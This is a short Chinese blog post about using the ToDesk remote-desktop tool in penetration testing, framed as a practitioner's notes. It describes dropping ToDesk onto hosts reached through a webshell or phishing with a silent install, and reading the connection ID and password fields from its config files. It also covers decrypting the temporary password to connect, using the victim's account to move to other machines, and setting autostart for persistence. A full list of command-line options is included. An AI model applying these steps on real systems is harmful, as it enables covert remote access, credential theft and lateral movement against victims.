Todesk在渗透测试中的简单运用
前言
度过了比较忙碌的6月,发现Todesk在渗透测试中比较好用,发现在钓鱼,或者权限维持上用处颇大,所以记录一下Todesk在渗透测试里面的简单运用。
介绍
ToDesk远程控制软件是一款稳定流畅的远程控制电脑手机连接软件,可远程桌面办公,远程协助运维.采用端对端加密,让每一次远程访问都安全可靠
使用说明
通过webshell或者钓鱼上线,直接下载最新安装包,使用/S进行静默安装。
实例:ToDesk_4.7.0.1.exe /S
配置文件重要字段解析
配置文件路径:
C:/Program Files (x86)/ToDesk/
C:/Program Files/ToDesk/
clientId=连接号
PrivateData=连接号加密形式
tempAuthPassEx=链接密码
LoginPhone=用户登录手机号
passex=用户账号密码
使用方式
利用上文中的连接号以及连接密码进行连接,链接密码可以覆盖到自己安装的todesk中tempAuthPassEx,进行解密。还可以进行扩展,如果用户登录了账号,可以直接使用用户设置的安全密码进行查看,是否有登录其他机器,可以直接进行横向。
坑点
自行安装后没有连接密码
这种情况比较极端,我起码碰到两次,暂时没有找到原因,但是有连接号,可以尝试利用命令行设置安全密码或者强制关闭todesk重新用命令行启动即可
命令行设置无效
这种情况碰到一次,比较简单,命令行taskill之后重新在目录李启动一次就好,注意双引号引起来目录
官方文档命令行参数
获取帮助:
ToDesk.exe -help
ToDesk.exe -help -control
当前版本号:
ToDesk.exe -version
当前运行状态:
ToDesk.exe -status
获取设备代码:
ToDesk.exe -getid
设置开机启动:
ToDesk.exe -autostart on/off
发起控制:
ToDesk.exe -control -id 123456789 -passwd a12345(仅支持设备列表里已解锁设备发起控制)
设置代理并启用:
ToDesk.exe -setproxy -proxyip 192.168.0.2 -port 8080 (没有账号密码可不用输入后面的参数) -proxyuser admin -proxypasswd 123456
启用/禁用代理上网:
ToDesk.exe -proxy on/off
退出运行:
ToDesk.exe -exit
有任何意见请评价。